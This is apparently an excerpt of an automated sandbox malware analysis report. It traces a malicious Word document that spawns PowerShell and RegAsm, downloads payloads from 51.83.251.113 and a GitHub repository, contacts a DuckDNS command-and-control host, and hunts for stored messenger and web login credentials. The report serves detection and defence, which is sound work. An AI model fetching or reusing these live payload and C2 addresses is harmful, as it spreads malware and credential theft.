              Source: Malware configuration extractorURLs: cavps7.duckdns.org
              Source: unknownDNS query: name: cavps7.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.22:49168 -> 84.32.44.139:1991
              Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /650/WERRFF.txt HTTP/1.1Host: 51.83.251.113Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
              Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49172 -> 178.237.33.50:80
              Source: global trafficHTTP traffic detected: GET /650/picturewithgetmebackgreatdayfor.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.83.251.113Connection: Keep-Alive
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49166 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: unknownTCP traffic detected without corresponding DNS query: 51.83.251.113
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041B380
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1695B26C-F1F1-49DB-AA4B-EDEA56D67046}.tmpJump to behavior
              Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /650/picturewithgetmebackgreatdayfor.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 51.83.251.113Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /650/WERRFF.txt HTTP/1.1Host: 51.83.251.113Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: bhvD26D.tmp.11.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
              Source: RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.388756607.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: bhvD26D.tmp.11.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
              Source: RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
              Source: global trafficDNS traffic detected: DNS query: cavps7.duckdns.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: powershell.exe, 00000008.00000002.380584613.000000000278E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.251.113
              Source: powershell.exe, 00000008.00000002.380584613.000000000278E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.83.251.113/650/WERRFF.txt
              Source: EQNEDT32.EXE, 00000002.00000002.362310425.000000000062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.83.251.113/650/picturewithgetmebackgreatdayfor.tIF
              Source: EQNEDT32.EXE, 00000002.00000002.362310425.000000000062F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.83.251.113/650/picturewithgetmebackgreatdayfor.tIFj
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
              Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.886740902.0000000000923000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.886651440.00000000008D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: powershell.exe, 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: powershell.exe, 00000008.00000002.380584613.0000000002C0A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
              Source: powershell.exe, 00000008.00000002.380256940.000000000074A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
              Source: powershell.exe, 00000008.00000002.381523200.0000000003509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
              Source: powershell.exe, 00000008.00000002.383299018.0000000005003000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
              Source: powershell.exe, 00000006.00000002.385646166.0000000002420000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380584613.00000000024E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
              Source: bhvD26D.tmp.11.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
